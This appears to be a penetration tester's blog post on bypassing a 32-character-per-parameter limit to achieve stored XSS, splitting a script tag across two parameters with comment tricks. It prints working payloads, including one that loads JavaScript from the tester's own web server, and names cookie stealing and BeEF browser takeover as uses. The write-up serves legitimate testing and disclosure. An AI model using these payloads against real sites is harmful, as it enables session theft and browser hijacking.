Pages

Saturday, January 11, 2014

XSS across multiple parameters with 32-character constraints per parameter

'Sup all,

Recently, during my job, I encountered Cross-site Scriptings (XSS) on a page with two affected parameters. So, XSS, big whoop. The catch is, you are only limited to 32-character per parameter and anything after that it is truncated. As some professionals know, clients may fight tooth and nail on the findings you report. In this case, they may argue that you can't put a malicious payload with just 64 characters, and they don't give a f* about an alert(1) printing on their page. To make matter worse, it's an internally served page - you can't serve malicious javascript over the internet. So, what to do? Drop the issue? No way ;)

Initial Test:
paramA=<script>alert(1)</script>
paramB=<script>alert(1)</script>

Resulted in a stored code displayed as part of the following HTML code:
 <script type="text/javascript" language="javascript">  
 //irrelevant chunks  
 // ..  
 // ..  
 var paramA = "<script>alert(1)</script>";  
 var paramB = "<script>alert(1)</script>";  

Length Constraint Test:
paramA=111112222233333444445555566666777778888899999
paramB=111112222233333444445555566666777778888899999

Resulted in a stored code displayed as part of the following HTML code snippet:
 var paramA = "1111122222333334444455555666667";  
 var paramB = "1111122222333334444455555666667";  

You should observe on the above snippet that any character after the 32nd will be cut off! Drats.
But not all is lost. There are a few ways you could approach this but here's what I did:
1. Use the good O' <SCRIPT src="//yoururl.com/malicious.js">
2. Use "*/" and "/*" to concatenate your payload
3. Since it's only intranet accessible, I fire up an IIS 7.5 on my test machine and serve up a javascript under the name "index.html". Yes, it works perfectly. ;) So you could do <script src="http://webserver_ip/"> and your javascript will execute nicely even if it's not saved as a '.js' extension. Nifty to know.

My solution:
paramA=</script><script%20/*
paramB="*/src="http://172.10.10.1/">

22 characters for paramA - safe!
30 characters for param B - safe!

I would use a shorter IP address (e.g. 10.0.0.2) but the 172.10.10.x is the subnet I'm attacking on. I have to stick to the /24 subnet but I did to change my javascript-serving webserver's IP from 172.10.10.100 to a single digit for the LSB octat (e.g. 172.10.10.1). Warning: Make sure you don't collide with your client's machine IP addresses.

Javascript Payload:
1. Just put your javascript code inside the 'index.html'
2. I did a simple alert("This is a javascript code execution for proof-of-concept..blah blah blah") to make my point. It could be anything from cookie stealing to BeEF's machine takeover =D
3. Save it as 'index.html'. If you're using IIS 7.5, put it in your X:\inetpub\wwwroot\ directory.

Resulting in:
 var paramA = "</SCRIPT><SCRIPT /*";  
 var paramB = ""*/src="http://172.10.10.1/">";  

And BOOM. ;)

Yea, many have done it and I've read a few posts on that. Still, it's different to personally encounter a live system which puts you in the spot to work around with the constraints. In short, I spent quite a number of hours due to my own n00bness, but managed to achieve a working XSS. Hopefully, my client is convinced to get it fixed. All in all, a simple but interesting encounter.

Laters y'all~

Regards,
JS.

Reference:
1. http://beefproject.com/‎ - The Browser Exploitation Framework Project